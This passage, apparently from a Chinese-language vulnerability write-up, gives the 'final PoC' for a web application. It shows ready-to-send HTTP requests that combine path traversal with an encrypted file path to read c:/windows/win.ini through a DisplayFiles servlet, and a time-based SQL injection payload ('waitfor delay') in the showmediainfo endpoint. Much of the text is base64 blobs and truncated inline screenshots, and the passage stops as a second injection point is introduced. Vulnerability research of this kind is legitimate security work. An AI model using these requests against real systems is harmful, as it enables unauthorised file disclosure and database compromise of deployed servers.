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
<h2 blockindex=26>0x04 最终poc</h2>
<h3 blockindex=27>DisplayFiles文件读取</h3>
<p blockindex=28>读取c:/windows/win.ini，先加密路径：</p>
<p blockindex=29><img src="data:image/png;base64,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
发送poc:</p>
<pre blockindex=30><code class="hljs language-js">POST /templates/attestation/../../servlet/DisplayFiles HTTP/<span class=hljs-number>1.1</span>
<span class=hljs-attr>Host</span>: 
User-Agent:Mozilla/<span class=hljs-number>5.0</span> (X11; OpenBSD i386) AppleWebKit/<span class=hljs-number>537.36</span> (KHTML, like Gecko) Chrome/<span class=hljs-number>36.0</span><span class=hljs-number>.1985</span><span class=hljs-number>.125</span> Safari/<span class=hljs-number>537.36</span>
Content-Type: application/x-www-form-urlencoded
Content-Length: <span class=hljs-number>41</span>

filepath=Iy4ZOyMhERdhPLlFrJHBaRdJo53c25S1
</code></pre>
<p blockindex=31><img src=data:image/png;base64,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
<h3 blockindex=32>showmediainfo注入</h3>
<p blockindex=33>先是简单的i9999参数注入，不走if (var5.equalsIgnoreCase("0"))，即令kind=1，为字符型注入。payload:' waitfor delay '0:0:6'--+<br>
poc:</p>
<pre blockindex=34><code class="hljs language-js">POST /templates/attestation/../../workbench/duty/showmediainfo HTTP/<span class=hljs-number>1.1</span>
<span class=hljs-attr>Host</span>: 
User-Agent:Mozilla/<span class=hljs-number>5.0</span> (X11; OpenBSD i386) AppleWebKit/<span class=hljs-number>537.36</span> (KHTML, like Gecko) Chrome/<span class=hljs-number>36.0</span><span class=hljs-number>.1985</span><span class=hljs-number>.125</span> Safari/<span class=hljs-number>537.36</span>
Content-Type: application/x-www-form-urlencoded
Content-Length: <span class=hljs-number>53</span>

kind=<span class=hljs-number>1</span>&amp;usernumber=&amp;i9999=<span class=hljs-number>12</span><span class=hljs-string>' waitfor delay '</span><span class=hljs-number>0</span>:<span class=hljs-number>0</span>:<span class=hljs-number>6</span><span class=hljs-string>'--+
</span></code></pre>
<p blockindex=35><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB4AAAANTCAYAAABPRwBUAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdeVxU5f4H8A8DiMtFk9zKQiYYEDV+pphbuBuYRIqp10y0XFK7rojGdV+u5pK2mJUS10SvWipeUlPTDAUttwxzQUDSS7lcw/C6MjPn/P6AOc6BOWcWQAb4vF+veclZnud8z3O25/U8Pue46PV6EUREREQVyK1bd3Dtxk1pumF9L9T2rFmOERERERERERERERE5B015B0BERERERERERERERERERKWDHcBERERERERERERERERERJUEO4CJiIiIiIiIiIiIiIiIiCoJdgATEREREREREREREREREVUSbvatvgd5y8PxwOKy9vDoEI867fxKISwiIiKi8sZ6DxEREREREREREVU8pTgC+AgeHA5E7g+ZpZflo5abiQe7OiGvAu8CERERPQqVoN5DRERERERERERElZKdI4BN2qPWsIOo5fVwjuGHTsg9fASGCzthaDfB0YzLUSbu7AjEnRuAh395x0JERETOozLWe4iIiIiIiIiIiKiyKrX2Sjf/fnA7fASGG+dhlDLOxIMf3sOdw3EwAADawyMiHnX8zF+XmIk7u97EnfNHCpZ36AccnoIHGIE6kz+Bh/T6RdM0AIvzrG/LkDkGt5JMywHUG4E64Z/AwysTd9YVdP4CwIMkd1yvtwxeUWzQJSIiouIcrfco10UA8/pNrQjggWk92TqF+fwwBrfMt9NhOmq1Cy2Mw6yeNKwp7u+Yggc3CvKpFf6J1JGtHott+0NERERERERERETOp9ReAW24sLWwkbIpXAvnPdgViLzDZg2LOIIHSeavSyzseD1/5OHyw1MUvrWnzuq2cj+QN3ICwI045K0d48DWiIiIqCpzqN6jUheR133icMd8vRtxyNvxgTT9YJc7cotu53A4cnftKRJlHPLWFnb+FuZzx5SPDbFYr8cRERERERERERGRM3JwgOsR3FnrjjsWlnh0KBw1m/sB7pyHfDRJ7h7krQ3Hg8Pv4UG7T+CRu7OwUbI9akXEo5afHww/jEHu4Tj7wrFpW+cLG2otj+ytFXUOKBwF7BGhRx0ObiEiIiIApVfvUa+LmHPrcA5e7fyA3A8KO3Gn4E7mBNTxKtyOWd0JuR8gd+0UGM6HI89fXoeR8skc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
然后是usernumber注入，需要进入if (var5.equalsIgnoreCase("0"))，即令kind=0，还需要加密payload:</p>
